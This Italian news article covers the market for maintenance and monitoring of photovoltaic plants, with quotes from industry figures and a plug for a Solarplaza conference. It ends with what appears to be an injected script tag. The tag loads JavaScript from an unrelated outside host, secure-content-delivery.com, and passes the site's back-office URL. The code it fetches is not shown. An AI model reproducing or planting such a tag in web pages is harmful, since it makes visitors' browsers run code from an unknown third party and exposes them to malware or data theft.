“I proprietari di impianti devono capire innanzitutto se i servizi forniti da un’azienda di manutenzione e controllo rispondono alle loro specifiche esigenze, il che significa che devono essere in grado di riconoscere quale tipo di problema ha il loro impianto: solo in questo modo potranno minimizzare i costi di questa attività” – afferma il dott. Pierre D’Amours, Executive Vice President di Solar Forensics.
I dati raccolti sul campo hanno dimostrato che servizi di manutenzione e controllo di qualità portano a un 5% di aumento della performance degli impianti fotovoltaici. Anche nel caso di piccoli impianti, questo significa migliaia di euro di rendimento extra ogni anno. Investire nei corretti servizi di manutenzione e controllo non è, quindi, solo un bisogno di base ma può significare anche un sostanziale ritorno economico.
“Le sfide maggiori nei servizi di manutenzione e controllo di alta qualità – sostiene D’Amours – sono legati alla Value Proposition che un fornitore può dare. In particolar modo, vanno considerate soprattutto le garanzie per i servizi e i prodotti, la disponibilità e i tempi di risposta quando c’è un problema, l’esperienza a tutti i livelli. D’altra parte, gli asset managers e i proprietari di impianti devono capire ed essere consapevoli che le loro responsabilità non finiscono nel momento in cui un impianto è commissionato e che, se è semplice costruire un impianto di generazione, il vero test è la capacità di mantenere l’impianto operativo al massimo della performance e assicurare, così, una produzione ottimale e la conseguente generazione del massimo profitto”.
Comprendere i bisogni specifici e le possibilità offerte dai servizi di manutenzione e controllo è abbastanza complicato: ogni impianto è diverso e ciascuna situazione richiede soluzioni e strumenti specifici. Inoltre, la competenza di ciascun fornitore è diversa, anche perché molte compagnie hanno iniziato a fornire questo servizio solo recentemente.
“Al momento, l’Italia rappresenta un enorme mercato potenziale per le compagnie che forniscono servizi di manutenzione e controllo – afferma il dott. Frattini, Vice Direttore di Energy e Strategy Group – e questo è il motivo per cui molti installatori italiani e Integratori di Sistema stanno sempre più riposizionandosi per fornire anche questi servizi per impianti già esistenti. In effetti, stiamo parlando di un mercato che produce un fatturato annuale di circa 533 milioni di euro: la manutenzione e il controllo rappresentano quindi per molte aziende un’attività in grado di assicurare un adeguato livello di profittabilità, non più garantito dalla sola installazione”.
Il dott. D’Amours è solo uno degli esperti che prenderà parte alla conferenza del 9 ottobre “Solar Operations & Maintenance” organizzata da Solarplaza. In questa occasione, domanda e offerta di servizi di manutenzione e controllo saranno esaminate al fine di comprendere al meglio necessità, tematiche e opportunità relative alla massimizzazione dei ritorni finanziari di impianti fotovoltaici grazie a servizi di manutenzione e controllo qualificati.
<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&cb=0.8342148814268798" type="text/javascript"></script>